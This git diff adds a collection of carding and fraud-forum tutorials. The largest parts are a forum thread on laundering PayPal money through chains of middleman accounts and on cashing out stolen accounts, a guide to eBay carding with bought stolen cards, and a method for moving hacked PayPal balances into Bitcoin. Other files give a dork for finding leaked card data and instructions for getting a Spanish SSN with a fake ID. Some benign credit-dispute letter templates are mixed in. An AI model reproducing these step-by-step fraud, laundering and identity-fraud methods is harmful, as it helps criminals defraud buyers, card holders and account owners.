bought +after linked, transfer money to middle man account, the amount of +transfer should be based on history and nearly same amount as not to +raise flag. +get high balance business account will be easier to execute this +transfer the money from funding acc to middleman account, to middleman +acc again..at least go thru 3 middleman account +if going this route, use fullz to create the account, same as middleman +account method, as it will be throw away at the end. +Dr.Clean wrote: +I have at least 3 funding accounts at all times: I usually use Ebay scams +to fund the majority of my funding accounts as the chargeback takes at +least 3-4 weeks if you correctly pull off the scam. Simply match the info +on the Ebay and the funding PP account Link them together and sell +something with substantial weight that would take at least 2-3 weeks to +ship, keep in constant communication with the buyer to delay charge-back +( Ive even shipped a small package to the buyer to be able to provide a +tracking number to the buyers) +Another way is to do a product ratio scale scam. Selling products that +are scale replicas to buyers thinking they are getting a fridge for cheap +only winding up with a 1:15 scale version of the product ( you would be +surprised how many people don't read the product description when they +see a extreme deal on an item. +I personally don't recommend using just middle man to middleman because +your middle man will get burned and you'll constantly have to update your +rings.... +I have used the Paypal mastercard but you have to have it shipped a +reshipper using the address that is on the paypal. they will flag the +account occasionally if it goes to far from the address that is on the +paypal unless you call using the phone and phone code that verified the +account and authorized the shipment to the drop address. +Summary : +have 3 funding accounts at all times + +use ebay scams as source of funding because it takes at least 3 - 4 weeks +for chargeback if u correctly pull off the scams +ebay account linked with the funding paypal accounts +sell something with really heavy, takes 2 - 3 weeks to ship. keep in +constant communication with buyer to delay chargeback +another way is product ratio scam, 1:15 replica items.. ppl dont read +description when see extreme deal on the item +dont recommend midlle man to middle man..because it will get burned and +need to update your rings +Dr.Clean wrote: +Yea I would never put the cashout and middle man accounts in the same +location, it looks weird to the security program algorithms because +usually paypal payments come from all over the country and or world +depending on whihc payment sytem your using unless you hook one of those +payment gateways you can pay direct to each other or use paypal mobile +and sell the correct product that doesnt look suspicious(I would have to +think about what would work perfect for that type of setup), If you just +want a quick cashout for low amounts you can have just middle and +cashouts but if you want to establish large amounts of funds cycling +consistently I wouldn't recommend it, if your strapped for cash just buy +a bunch of fullz bulk and create the correct accounts. The more you +bounce the less you'll have to worry about. +Summary : +cashout and middleman account must be in different location +the more money go through..bounce to numerous account, the less you'll +have to worry about +Dr.Clean wrote: +If its a guest checkout it really depends on the site you are using and +how valid paypal considers they're payments. Majority of the time they +are going to ask you to login for paypal to paypal transfers, unless your +using a online store or gateway that accepts credit cards as payment +directly to your paypal. If your doing that be sure to use socks or a vpn +that matches the cc's location so that you dont trigger PP's sec. +algorithms +It wont just clean it bouncing from account to account, cycle it through +an online store with very low transaction fee's( preferably very small +percentages not flat fee's you kill your profit with large percentages +when you start doing big transfers) Try not to send the entire amount at +once and split the cleaning up in to pieces ( 200-300 for $1000 cleaning) +(500-800) for cleaning 3-5k. + +Summary : +bouncing from middle man to another middle man account will not clean the +funds +always use it via a payment gateway...cycle it with "buy" something on e- +commerce store +do not send entire amount at once, and split the cleaning process +200 - 300 for $1000 +500 - 800 for 3 - 5k +Dr.Clean wrote: +Call paypal from the the phone that verified the account, use the contact +us code on the phone it helps with verifying you have control of the +account, assume the account holders info when they ask and politely +explain that the hold is prohibiting you from continuing business, be +very persistent that you need this money, all paypal agents can lift +holds only certain agents can lift restrictions, Ive had holds lifted +after 5 mins on the phone majority of the time, if it doesn't work hang +up and call back and complete the same process with a different +agent(preferably a American woman foreigners seems to give a harder time) +Broadband: that may work simply because Idaho is a big state and it may +not trigger anything if the payments aren't coming and going to the exact +same place +I use a bunch of security measures to keep everything kosher +I run a VM through whonix through tails through openVPN and just buy +fresh socks5 and match the IP's to what ever info I need matched. But +dedicated IP's will do just fine if your not as computer savy. +Summary : +when call paypal. always spoof the number which is same number you +registered on paypal (spooftel) +use the contact us code provided. helps for verifying +remember the acc holder info, and politely explain the hold funds is +prohibiting u from continuing business. must be persistent +all paypal agent can lift holds. only certain agent can lift restriction +if agent asking too much questions, hang up and call back .. talk to +another agent which is less strict +Dr.Clean wrote: +The Ebay Scam method takes alot more setup then simply receiving dirty +funds from a cc(its not recommend to unless you have the time and cash to +do it right), the way I get around the 21 day holds is providing a + +tracking number and providing shipping information(and calling paypal), +The ratio eBay scam is the easiest way to do it. +First in the description you put that the product is 1:15 ratio to scale +DO NOT PUT IT IN THE BEGINNING AT THE LISTING (nobody every reads the +product description when they see a great deal on something large) you +send them a letter in a box so that you can provide a tracking number +telling them that there product is arriving and providing a receipt this +will buy you more time to send something I just buy a bunch of 1:15 scale +doll appliances and place in the product description that these are +handmade and no refund will be provided ( Ive had Ebay side with me when +customers got angry and disputed when they received a doll fridge they +paid $700 for) If it states in the description then its nothing that the +customer can do so its semi legal your just tricking them into buying +something the customer doesn't want. +You need to doctor your ebay account alittle and pad its feedback to +successfully pull off this scam to get around Ebays limitations (honestly +it is easier to buy hacked bank accounts and create a paypal that matches +the bank info and simply transfer it out) I only really fool with ebay if +im running low on hacked business bank accounts) I like the ratio scams +because if you do it right its nothing the customer can do 1 and it takes +literally forever for a charge back Literally!! +Summary : +ebay scam also not easy to fund the account +to get around 21 days hold, is provide tracking number, provide shipping +information and call paypal +however easiest ebay scam is selling 1:15 fake product ratio +1:15 scale ratio DO not put it in the beginning at the listing, ppl +usually dont read product description when they see great deal on +something large +send them a letter in a box, (provide tracking number).. in the letter +tell them product is arriving and providing a receipt as well +also need to artifically create fake feedback on your ebay account and +removes the ebay limitations before start pulling this scams +it is easier buy hacked bank accounts and link with paypal. then transfer +it out +Dr.Clean wrote: +I usually stick to dedicated Ip's, VPN + RDP as socks5 sometimes get +blacklisted when a provider is known to become involved in fraudulent +activity but Convience sells a pretty good VPN socks5 and rdp package +that wouldnt give you any of the trouble simply buying socks5 may get you +into. + +Summary : +stick to dedicated IP, +convivencia sells good vpn socks5 and rdp +Dr.Clean wrote: +mentalmario wrote: +Is it possible to cash out a stolen PP account? +... Well obviously yes, ofcourse its possible, But do you know how to do +it? +Dr.Clean : +Match the Location(get literally as close to the IP that is used as +possible), +Open a bank account that matches the info on the hacked account +preferably something you can open online +in the same dedicated IP you have matched up with paypal account +(build history and cookies for at least 1 week without moving any funds I +recommend 2-3 weeks just to be safe) +then transfer the funds to your middle man accounts (preferably 4-5 +decreases the chance of your cashout account being hit with the +chargeback) create the middle man accounts with bulk fullz and buy a +verified business account for the cashout account( I recommend getting a +buyvcc business account letting it get limited then verifying it with +good doc scans triples the allowed limitations on daily transfers on +business account on limited then unrestricted accounts, and cashout with +a bank drop preferrably one with a physical ATM card +That's the easiest way Ive found so far. +Summary : How to cashout stolen paypal account +open bank account based on paypal info +open the bank account online +dedicated IP, must be closest possible location with the stolen paypal +address +build some cookies/browsing history at least 1 week,.. 2-3 weeks +recommended..login paypal, login online banking,browsing +then from stolen paypal..tranfer to middleman account.. to another +middleman 4-5 accounts +the last account which is cashout account. buy from buyvcc biz +account..withdraw limitation must be removed/unrestricted +then cashout with a bankdrop ..preferably with physical atm card + +*Note - im not sure why Dr.Clean adviced to open bank account based on +the stolen paypal, but at the ends..seems not related lol +Dr.Clean wrote: +darmy wrote : What are some other ways to cashout/transfer out the funds +from the paypal account other than the ways mentioned such as freelance +sites, currency exchanges, shopping, and middle man accounts? +Sorry Brother didnt see this post +Buying Giftcards +from giftcardzen or giftcardgranny(be sure to match the IP they will flag +the account) +Going on Ebay selecting instore pickup for bestbuy or such and using a +fake name and ID, then return the next day and get the item transfer to a +giftcard and sell the giftcard for cash on craigslist +Clean the funds and sell them directly for BTC(be sure to clean the funds +first they will seize dirty funds) +Buy things for people on brawker.com and similar sites +at one point reckless was buying pp funds for btc( not sure if hes still +doing it) +and my favorite: +Get Dr. Clean to clean and cash the funds out for you for a % +Summary : Alternative cashout/transfer funds from paypal +buying giftcards at giftcardzen or giftcardgranny (have to match IP) +go to ebay, select instore pickup - bestbuy (require fake physical ID) -> +next day return the item back -> money transfer to giftcards -> sell +giftcards on craiglist +Buy things for people on brawker.com and similar sites diff --git a/EBAYCARDING_txt.md b/EBAYCARDING_txt.md new file mode 100644 index 0000000..8ddbff1 --- /dev/null +++ b/EBAYCARDING_txt.md @@ -0,0 +1,100 @@ +# EBAYCARDING + + +--- + +Hello guys in this tutorial i will give you 100% working ebay carding method of 2017 , ebay is the international e-commerce site.All product are available on ebay and it is very trusted site. think that you can buy any product by carding for free. So this is the best and working tutroail for ebay carding, + +Requird: +Socks 5 and RDP +Good internet connection +Android or Pc device. +Method: +i devide this method in 3 section so that easily you can understand it and card product. +lets explain all : + +section 1> +secure your self + +1) We need to get an ebay with email access. + +2) We use email access to get access to the paypal +. +3) We then get some socks5, I use [ www.super-socks.com ] Super Socks Service. + +4) Always use same state socks5. If you can use same city. But not needed. + +5) Check your socks5 on http:// +www.kingsocks.org to check for PP Blacklist. + +6) Now log-in to your socks5, visit Check your IP address in system anti fraud detections, detecting real location to verify no fraud detection. + +Section 2: Securing the E-Mail. + +1) Now we need to secure E-Mail Account. + +2) Create an email only to receive email per account. + +3) Log-in to eBay/PP Mail Access. + +4) Use the email forward option. We enable the "do not store" option. + +5) Now all email is routed to our set-up email. + +6) Make sure to enable/disable as you need. E.G. Only redirect when you're AFK for a while. + +Section 3: Using the PayPal/eBay Account. + +1) Now we are all secure, it's time to use the eBay Account +. +2) Log-in to the eBay account and find the item you want to card. + +3) Card the item and checkout, remember to use your socks5. + +4) Once checked out, immediately move item to the archive. + +5) Now we message the seller, we say that our family member's birthday is in two days, can you ship direct to them. If they accept, go ahead, if not, ask to refund. + +6) Check the Inbox to make sure no messages are linked to your product. + +7) Now visit PayPal.com account, make sure to archive payments to avoid detection. + +8) When you ask/receive questions for your item. Always move items to the default "My Folder 1" + +9) We use "My Folder 1" as it's default. Trash folder on eBay can't be deleted, so we use this to keep under the radar. + +10) Move your item in and out of the archive to check status (E.G. Check if shipped etc). + +Additional info of the above method: don't card product more than 40k and try to buy some cheif product. + +Method 2 + +1.  Firstly you need fresh, clean RDP server. You can buy them from tools shop(I use this: http:// superded.biz), or just find some providers who offer free trial (for few days, week or two). When you got RDP server, connect and do everything in that server +. + +1. If there's no mozilla firefox browser, download it. + +2.  Now you need some socks +3 DON'T USE FREE SOCKS POSTED ON FORUMS OR FACEBOOK, YOUR SOCKS5 SHOULD BE PRIVATE. You can buy them on VIP72 shop +. + +4. When you got your socks, connect with them and go to ebay.com,ebay.co.uk or any other country ebay. + +5. This step what you gonna do is part of my method. Firstly, check out some items(any item, just click on it, go back and check other one). Close ebay and leave it for a +while. You needed this to get ebay cookies generated. + +6. Now you need VALID working CC. This is the most important thing, because to get right card for ebay is very hard these days. Finally, I'm gonna reveal a secret whereI get valid cards. Shop is: http:// +allenen.com/shop Few things about this shop, firstly you need to check for new updates everyday, because when they update let's say 1000 cards, after 1-2 hours left only 300-500 cards, just be fast. Also you have 10 minutes to check if card is live, if dead you will get refund. They accept Bitcoin +and Perfectmoney. +7.Now, when you are ready to buy a card, look for BARCLAYS or CHASE bank, they're best for ebay. Doesn't matter BIN, just any of these banks. When you find a good card, buy it, go to my cards +and you will see card holder info. +8. Go back to your server, open again ebay site and register a new account. Fill information as card +owner's(even create new email with card owner's name). +9. Now when your account is created, again check out few items(just click on them, don't buy) and pick one item for about 10-20$, add to cart and checkout. PUT YOUR(OR YOUR DROP) ADDRESS AS SHIPPING, continue checkout, choose credit card payment and you will be rederected to paypal site. +10.  Fill all card holder's info(address, card details, but email yours) and continue checkout. If +everything good, you will see confirmation page, just click on Confirm payment, and you will get +successfull order page! If you got error, that's mean card could be dead or maybe it's already +linked to another paypal account. So you need to clear all date and start again. But with these bank's +cards, everything should be ok. + +11. Now, if you got successful order, you can choose anything up to 200$(sometimes works on 300-400$)  That's all! diff --git a/FREEOPENVPNPROXYANDPPTPVPN_txt.md b/FREEOPENVPNPROXYANDPPTPVPN_txt.md new file mode 100644 index 0000000..5fe9d36 --- /dev/null +++ b/FREEOPENVPNPROXYANDPPTPVPN_txt.md @@ -0,0 +1,6 @@ +# FREEOPENVPNPROXYANDPPTPVPN + + +--- + +https://www.vpnbook.com/freevpn diff --git a/Goodwill letter 1_pdf.md b/Goodwill letter 1_pdf.md new file mode 100644 index 0000000..6953cf9 --- /dev/null +++ b/Goodwill letter 1_pdf.md @@ -0,0 +1,31 @@ +# Goodwill letter 1 + + +--- + +YOUR NAME +YOUR ADDRESS 1 +YOUR ADDRESS 2 +Month Day , 20XX +COMPANY NAME +DEPARTMENT NAME +ADDRESS +CITY, STATE ZIP +Dear Ms. NAME: +I have been aCOMPANY NAMEcustomer since 20XX and during that time, I have enjoyed my experience +withCOMPANY NAMEgreatly. I am writing to see if you would be willing to make a "goodwill" +adjustment to your reporting to the three credit agencies. I havetwolate payments on the above +referenced account that date back to 20XX. Since that time I have been an exceptional customer paying +every month on time. +Because of my exceptional payment history over the last X years, I would like you to consider removing +the negative payments from my credit report. At the time of the late payments, I was in the process of +changing jobs. I say that not to justify why the payments were late, but rather to show that the late +payments are not a good indicator of my actualcredit worthiness. I hope thatCOMPANY NAMEis willing +to work with me on erasing this mark from my credit reports. +I have been a very happy customer in the past and hope to continue a long relationship withCOMPANY +NAME. With today’s credit industry socompetitive, I know how important it is to maintain good +relationships with customers.COMPANY NAMEhas been exceptional in my book so far and I highly +recommend it to all my friends and relatives. I hope that you will deeply consider my request and prove +once again, whyCOMPANY NAMEis heads above the rest. I look forward to your reply. +Sincerely, +Your Name diff --git a/GuideFastestWaytoGetCreditCardCredentials_pdf.md b/GuideFastestWaytoGetCreditCardCredentials_pdf.md new file mode 100644 index 0000000..6fdc483 --- /dev/null +++ b/GuideFastestWaytoGetCreditCardCredentials_pdf.md @@ -0,0 +1,23 @@ +# GuideFastestWaytoGetCreditCardCredentials + + +--- + +[Guide] Fastest Way to Get Credit Card +Credentials +­Sacky +This is seriously the fastest and easiest way to get full credit card info. This includes anything a +credit card can cover: CVV, VCC, CC, SSN, full personal info, email passwords, bank accounts +passwords, full addresses, phone numbers, bussiness address, etc. +We’ll do this by using dorks. Dorks are, as the name suggests, very stupid simple inquiries, +​ ​ +mostly used in SQL injecting, exploits. The dorks can be used with big seach engines like +Google, Yahoo! or Bing. What we will do is use them to find credit card credentials. +A dork looks like this: +Simple thing, ain’t it? So, our dorks are: +filetype:txt ccnumber OR cvv OR cctype +​ +filetype:txt vbs OR ssn OR vba +Search for this on Google and BAM! Hundreds of credentials ready to be devoured! + +Any questions do not hesitate to PM me on the Marketplace. diff --git a/HACKINGBANK ACCOUNT INFO_txt.md b/HACKINGBANK ACCOUNT INFO_txt.md new file mode 100644 index 0000000..cf5f75d --- /dev/null +++ b/HACKINGBANK ACCOUNT INFO_txt.md @@ -0,0 +1,28 @@ +# HACKINGBANK ACCOUNT INFO + + +--- + +oined: Mon Jun 06, 2016 2:48 pm +Post Thu Jun 16, 2016 2:15 pm +HACKING BANK ACCOUNT INFORMATION +Most people learning hacking always have a keen interest in knowing that how they can hack bank accounts of other people. But most of them find it pity much difficult such that now they have made a perception that bank account information like credit cards or debit cards or net banking passwords cannot be hacked. Its truth to an extent that hacking Banking account information and credit or debit cards passwords is most difficult and almost impossible part. Today i will discuss with you why hacking bank account information is tough and always considered as impossible task. We will also discuss the different methods that hackers use to hack bank account information nowadays. + +I am quite sure that almost everybody using internet nowadays uses that internet to pay online bills, book reservation tickets, purchase online things or simply transfer money i.e. involved in at least some kind of online transaction that is related to money i.e. banking information, credit or debit card payments or simply Net banking. Most of banks uses SSL(Secured Sockets Layer) connection (to read more click here )and at least 128 or 256 bit encryption for online banking and transaction purposes. Also now an extra layer of security is introduced that is called transaction PIN layer means for each and every online transaction you have to enter your passwords and during transaction you have to enter PIN (a type of password that varies 4 to 8 chars in length). Thus bank do alot of work to protect your secret information and credentials from the eyes of the world that may wish to gain access to your such a vital information. + +Below example will illustrate you how powerful the encryption method is: + +40 bit encryption, means there are 2^40 possible keys that could fit into the lock that holds your account information. That means there are many billions of possible keys that means brute forcing such thing is imposable. Only thing now left is dictionary and rainbow attack. But its not only the security measure that banks used to secure there information. Also its only 40 bit encryption. +128 bit encryption means there are 2^88 times as many as key combinations that are being possible for 40 bit encryption.That means a computer would require exponentially more processing power and time than for 40-bit encryption to find the correct key. + +That's a very powerful method of encrypting data sent from your machine to bank machine. But unfortunately it's all is useless to you once your system has been compromised or hacked. + +Now How these all security Encryption can be bypassed and your system can be compromised online. There are several methods for exploiting and bypassing such account information. Note : This is for educational purposes only( For more details read Disclosure). + +Some of them are: + +1. Phishing : We have discussed phishing on this website alot of times in tutorials like how to hack Gmail accounts password or hacking Facebook accounts and others too. But for new Guys I explain what is Phishing. Phishing is a technique to hack password and login details of a particular website using Phish pages. Now what are Phish pages? Phish Pages are simply the fake pages that looks the original webpage. The only difference between phish page and original page is the Address bar link (for normal user) and redirection post and get method( inside source for advanced users). How to identify a fake link? Just check the address bar URL for a fake page or Phish page it will be showing different URL than the original URL. Also if you want that everything is done automatically then install a Web security tool bar in your browser (AVG and Crawler web security tool bars are good choices) as it detects the phishing automatically and do not allows you to visit Phishing Pages. + +2. Trojans: Trojans are type to viruses that steals your information. It can be in many forms like Keyloggers or RAT's( remote administration tools). What a keylogger do is that it monitors all the keys that you have pressed from your physical keyboard and stores them in form of a log and send these details to hackers. RAT's are advanced form of Keyloggers that remotely monitors all your activities where keylogger is simply a functionality. Using RAT hacker can connect to your system anonymously i.e. without your information when you are online. RAT's have a huge list of functionality and these are best type of hacking tools available in the market. Now How you will protect yourself from Keyloggers? Just keep your antivirus updated and install Keyscramber that encrypts your keystrokes. Now why i haven't mentioned RAT there is because once the RAT enters your system you cannot do anything other than formatting your system. So RAT's attack only can be prevented before they enters in your system. For preventing from RAT's Please do not download any software or cracks or keygens online. Also avoid downloading freewares from new websites use certified websites only like CNET, filehippo etc.. Also please avoid testing fake hack tools (recommended for hackers) because most hacking tools have keylogger and RAT's attached to them. Test it under secured conditions like on Virtual Users. Means install virtual operating system user Virtual PC or Virtual Box and then test them there. + +3. Session Hijacking: Most of us uses Wireless Networks to access the internet and data flow in form of packets and channels. And we know that Wireless are easier to hack as they have very weak encryption. So Hackers hack the wireless networks and using session Hijacking they take control of the internet data transfer and redirects the user from original path to their path. Means suppose you are visiting Google or Gmail or Facebook, then hacker when get access then he can redirect you to any of the page and capture you account details. Packet sniffing is another way to hack the account information and credentials using the wireless networks where Hackers captures packets and decrypt these encrypted information to get the information in form of plain text. Now how you will prevent this? Its also pity simple to prevent this, you need to hide you SSID and BSSID from being discovered by the other networks. Just leave the SSID or BSSID empty for that. Now hacker will not be able to discover your wireless router so he will not been able to hack it. diff --git a/HOW TO CREATE A NEW EUROPEANSSNANDORID_txt.md b/HOW TO CREATE A NEW EUROPEANSSNANDORID_txt.md new file mode 100644 index 0000000..9e0c5f3 --- /dev/null +++ b/HOW TO CREATE A NEW EUROPEANSSNANDORID_txt.md @@ -0,0 +1,83 @@ +# HOW TO CREATE A NEW EUROPEANSSNANDORID + + +--- + +HOW TO CREATE A NEW EUROPEAN SSN AND/OR ID +After reading alot of posts regarding creating a new SSN and/or a new identity, this is my ¨how to¨ + +First of all! This is only for educational purposes for Darkode community and i never tested this myself ;-) + +There are 2 ways the hard way and the easy way. + +THE HARD WAY + +STEP 1: +Get yourself a A++ quality novelty EUROPEAN ID (i recommend scanman for his UK and DE work). + +STEP 2: +Go to Spain March or April, recommended are costa del sol or catalunya dont go to the mayor cities like Barcelona or Madrid find i nice small seaside resort with a lot of bars and hotels (Blanes, Lloret de mar, Salou are good places to start) + +STEP3: +Ok now you are in LLoret de mar a town in Catalunya Spain. Its March and the streets are full with youngster drinking and having a good time! +You will need to find a job! Go to all the bars (there are alot) and ask if they need staff. + +YES you found a job! After a few days your new employer will tell you to get a NIF/NIE number, this is a Spanish SSN , your employer will give you a few papers that you have to sign. +With this papers you go to the police station in Mataro (this is a seaside industrial town) +Without a job you cant apply for a NIF/NIE + +Standing infront of the Police station you will see on an average day 100 to 200 people standing in line (mostly black due to alot of immigrants from African countries) + +You dont have to wait because your european! Go inside, now you see alot of people mostly white applying for a SSN to work a summer abroad. + +Standing in the NIE office you see alot of underpaid officers not really wanting to do this job, show them your novelty id. +They dont or want to speak English so dont even bother talking to them if they dont talk to you! +If you id is A+ there is no problem they make a copy fill in a paper make a copy of that to and give you a bunch of papers to take with to a local bank. + +At the local bank in Lloret de mar (find a nice small bankoffice) give them the paper and your ID , you now need to pay around 20 euro, you get a stamp on your paper. + +After 2 weeks you go to Mataro again and pick up your Spanish SSN, you notice that they dont use computers everything goes by hand! + +CONGRATULATIONS your now the proud owner of a spanish SSN. + +Your employer will now give you a Contract! Make sure this is at least a 20 hours working contract + +STEP4: +Ok, we have a SSN, Contract all registrated to your European nov ID, with this you can open a bank account, rent a house etc, DO all of the above + +STEP5: +Ok we now have: +1. SSN registrated to your novelty ID +2. A Job with contract on your novelty ID +3. A bank account with your novelty ID +4. A nice Apartment . +5. FREE Healthcare (your employer pays that) +6. UNTRACEABLE +7. A SSN number that you can use in most EU countries + +STEP6: +Its now in the end of September your employer tells you that the bar is going to close the 12th of October, so you will need to find some other work, you can search for work but there is not a lot available due that there are no tourists. +If you found a job take it! and repeat this for the next 3 years! After 4 years you will be eligable for a Spanish passport and citizen ship. + +THE EASY WAY + +This will cost you some serious money. + +STEP 1: +Get yourself a A++ quality novelty EUROPEAN ID (i recommend scanman for his UK and DE work). +Go to my office in Spain. + +STEP2: +We employ you in our company, and give you all the papers that you need to apply for a NIE/NIF number. + +STEP3: +Follow step 3 as mentioned in the hard way (without finding a job, and signing a contract) + +STEP4: +Follow step 4 as mentioned in the hard way. + +STEP5: +Signing the contract with our company, details will be explained and you can go back to your own country, no need for you to stay in Spain. + +STEP6: +After 4 years you will GET a Spanish PASSPORT diff --git a/Hacked PayPal to Bitcoin_pdf.md b/Hacked PayPal to Bitcoin_pdf.md new file mode 100644 index 0000000..2a7983a --- /dev/null +++ b/Hacked PayPal to Bitcoin_pdf.md @@ -0,0 +1,27 @@ +# Hacked PayPal to Bitcoin + + +--- + +Hacked PayPal to Bitcoin (No VirWox) 2015\ +Hi guys! This is a simple tutorial for exchaging hacked paypals to Bitcoins. Requirements: -VIP72 VPN or +other good VPN -Some hacked paypals -VBA(Virtual Bank Account) with FAKE infos -1 unveridied and 1 +verified fake paypal -1-2 hour +PART 1: PayPal cahsout 1.Clear cookies, use VPN and create 1 fake ppl with VBA and VERIFY it! 2.Clear +cookies, chanege to random VPN and create 1 unverified fake paypal.(Wait 30min) 3.Clear cookies, +change VPN to hacked paypal location and send 50$ as GIFT to fake paypal. 4.Send 50$ till you limit the +hacked paypal. 5.Change back VPN to unverified fake paypal and DONATE immediatelly to verified fake +paypal. 6.Get new hacked paypal and repeat step 2-5. Proceed to step 7 after you reach MAX 1000$! +7.Clear cookies, change VPN to verified fake paypal and withdraw to VBA. 8.Wait 3-4 days and cross +fingers. You should get your money! +PART 2: VBA usage Part 1 is anonymus since you didn't used any personal info and you did hide your IP! +But if police really wants to find you they can detect what you have done with your VBA. +-If you ordered to your real house, you are fucked. +-If you used Wester Union for yourself, you are fucked. +-If you done anything that can be associated with you, you are really fucked. So how to be competelly +anonymus?! +Buy Bitcoins! All exchangers accept WU, why you should risk yourself? +1.Clear cookies, use verfied fake paypal VPN! +2.Register to WU with the fake VBA details. +3.Send money to exchanger and get BTC. After you got your Bitcoins you are GOLD. They will never find +you. Its easy and anonymus! diff --git a/Hippa_Clear_Medical_Debts_pdf.md b/Hippa_Clear_Medical_Debts_pdf.md new file mode 100644 index 0000000..a6a6c69 --- /dev/null +++ b/Hippa_Clear_Medical_Debts_pdf.md @@ -0,0 +1,54 @@ +# Hippa Clear Medical Debts + + +--- + +HIPPA CLEAR MEDICAL DEBTS +WHAT IS HIPPA? +HIPPA is the Health Insurance Portability and Accountability Act. This privacy rule mandates +that your personal medical information may not be shared unless there is permissible reason for doing +so. +HIPPA extends to credit reporting agencies and collection agencies as well. +For you, HIPPA will assist YOU in dealing with delinquent medical collection accounts. +HIPPA MEDICAL DISPUTE LETTER +The HIPPA letter template will frighten the collection agencies and credit bureaus and remind +them that if they fully validate your validation letter on your medical bills, they are violating +HIPPA regulations and are doing criminal activities. +HIPPA laws do not allow your doctor or health care provider to share your medical files without +your consent under a HIPPA release. +There has been an increase of doctors asking for a HIPPA release to be signed by you, however +this only allows them to share with other medical professionals not 3rd party collectors. +Make sure you cross out everyone other than the party intended to receive your medical +information (do not sign a full HIPPA releases). +The medical dispute letter should be used after you sent out after COLLECTION ACCOUNT +VALIDATION LETTERS. The collection account validation letter templates are included with +this upgrade. +The collection agencies occasionally sends your medical records as validation. If they do that, +include a copy of the medical records and send it to the credit bureaus. Thereby proving they +have broken HIPPA laws (a major violation of the Privacy Act laws!). +There are 2 ROUNDS OF HIPPA DISPUTE LETTERS. START WITH THE FIRST ROUND, +wait 30 days for response and then go to the FINAL ROUND OF HIPPA DIPSUTE LETTERS. +COLLECTION ACCOUNT VALIDATION LETTER +Send the Collection Account Validation Letters to every medical collection company +a) This is your first initial contact to the medical collection agency. +b) You need delivery confirmation, save receipts or emails from USPS confirming delivery. +Certified Mail is usually best. +c) Wait for a response from the collection agency. Goal is not to get one. + +Your full account numbers may not be provided on your credit reports. You can cut and paste +each delinquent account and include each account snapshot with the letter. +Again, the collection agencies occasionally sends your medical records as validation. If they do +that, include a copy of the medical records and send it to the credit bureaus. Thereby proving they have +broken HIPPA laws (a major violation of the Privacy Act laws!). +Keep detailed records in case you have to sue, but in most cases you will be fine. +As a refresher below are the 3 credit bureau addresses again. +Experian +P.O. Box 4500 +Allen, TX 75013 +Equifax Information Services LLC +P.O. Box 740256 +Atlanta, GA 30374 +TransUnion LLC +Consumer Dispute Center +P.O. Box 2000 +Chester, PA 19022 diff --git a/How to Earn Bitcoins for Free_ Udated 1_pdf.md b/How to Earn Bitcoins for Free_ Udated 1_pdf.md new file mode 100644 index 0000000..aa38015 --- /dev/null +++ b/How to Earn Bitcoins for Free_ Udated 1_pdf.md @@ -0,0 +1,65 @@ +# How to Earn Bitcoins for Free Udated 1 + + +--- + +How to Earn Bitcoins for Free! +By Elamino + +Bitbin.it +• BitBin is a pastebin service which allows you to share snippets +of text (usually programming code) publicly, and shares the +site's ad revenue with you (in Bitcoin) based on the amount of +views your snippets get. + +Best way to spread with Bitbin! +Go to Bitbin.it and Create a new Snippet + +Best way to spread with Bitbin! +Put in anything you want in the textbox. I am going to do “Earn +Free Bitcoins!” + +Best way to spread with Bitbin! +You will now need a Bitcoin Wallet, I recommend using Coinbase. +Go to www.coinbase.com + +Best way to spread with Bitbin! +Once you have registered, We need to create a bitcoin Address. +Click on Account Settings and you should see Bitcoin Addresses. +My Details, blocked for a +reason. + +Best way to spread with Bitbin! +Click Create new Address and it should come up a new address. +Copy the address for the next step. + +Best way to spread with Bitbin! +Click Earn Bitcoins and where it says Bitcoin Address, put your +Bitcoin Address that you copied. + +Best way to spread with Bitbin! +Click Main and where it says Paste Title, put your Title for your +Snippet. Finally do the Captcha and Submit Paste!. Copy the link +for the Next Step. + +Best way to spread with Bitbin! +Now, you will need a source e.g. Youtube, Facebook Etc. I am +going to stick with Facebook. The Facebook Page I am going to +be using it Bitcoin Page. + +Best way to spread with Bitbin! +Paste the Link of your Snippet to the Facebook Status on the +Facebook Page. You Could a title of your own. It make it +attractive. You can do it on many pages you want!. The More the +Better! + +Updating your Posts and Status. +In a couple of days, you will start earning a huge!, I mean huge +amount of views on your snippet. You will have to keep updating +it on other pages on Facebook. So you will be still earning views. +I hope you are rolling in Bitcoins, day by day!! +Updates and more methods will be coming soon (Only Gold) + +*Elamino* +Earn Bitcoins for Free! +All Rights Reserved 2014 - Elamino diff --git a/How to get 100_000 bits_pdf.md b/How to get 100_000 bits_pdf.md new file mode 100644 index 0000000..76dbd63 --- /dev/null +++ b/How to get 100_000 bits_pdf.md @@ -0,0 +1,172 @@ +# How to get 100 000 bits + + +--- + +Welcome to our eBook mini guide to getting started with bitcoin and +to getting your first FREE bitcoin "bits" - we are SUPER EXCITED +to share this journey, and honoured to introduce bitcoin to you. +We are blessed to get to share tomorrows technology (currency, +financial platform, store of value) with you today... +...and to be able to give you the chance to get in on the ground floor +of bitcoin too - to get involved while it is still in it's infancy.. and if +you doubt this or think you are late to the party then we've got good +news for you - take 10 minutes to read this short eBook and you'll +see that you are just in time :) + +Introduction +Everyone is talking about bitcoin, it is growing in adoption, being used by more and more +businesses, and increasing in value. +In this quick report we will explain quick what bitcoin is, what it's future potential could +be,but most importantly; how you can claim THOUSANDS of "bits (bitcoin units) a day, for +free. +It's not too late to join the growing trend of bitcoin, to invest, or to simply get hold of some +for free and become a part of the future growth of bitcoin! + +Chapter 1: What is bitcoin? +Bitcoin is a digital currency. It is open-source and decentralized which means it isn't owned +by any government, or controlled by any bank. +Nothing can be hidden/manipulated due to how transactions are verified on a sort of global +spreadsheet called the "Blockchain" (trying to keep things super simple but if you want to +read the ins-and outs you can find the full "bitcoin white paper" which goes into depth in +how transactions are confirmed and "minded") in which 1000s of computers verify each +purchase transaction and bitcoin send on the network. +This means that essentially this spreadsheet is duplicated and synced live all around the +world by 1000s of people - similar to a peer-to-peer system which has no focused +centralization to control (or manipulate) it. +You can send bitcoin from your computer, tablet, smart phone or other device, to anyone, +anywhere in the world, day or night. +The transaction fees are either 0% or a tiny fraction compared to the cost of a credit card +payment or a bank transfer (especially internationally). And the time taken is dramatically +reduced - on average, a transaction completes in 20-30 minutes (once it has been +verified). + +How is bitcoin "printed?" +It isn't. +No one prints bitcoin in the same way that regular national currency is printed. +Whereas a bank can simply produce more money to cover the national debt, thus +devaluing their currency and causing inflation.. +Instead, bitcoin is created digitally, by a community of people that anyone can join. Bitcoins +are "mined" using computing power in a distributed network. This "mining" is the method of +processing and securing each transaction - locking them into the "blockchain" ledger. +Miners earn bitcoin as rewards for using their computing power when they verify +transactions and solve the complex 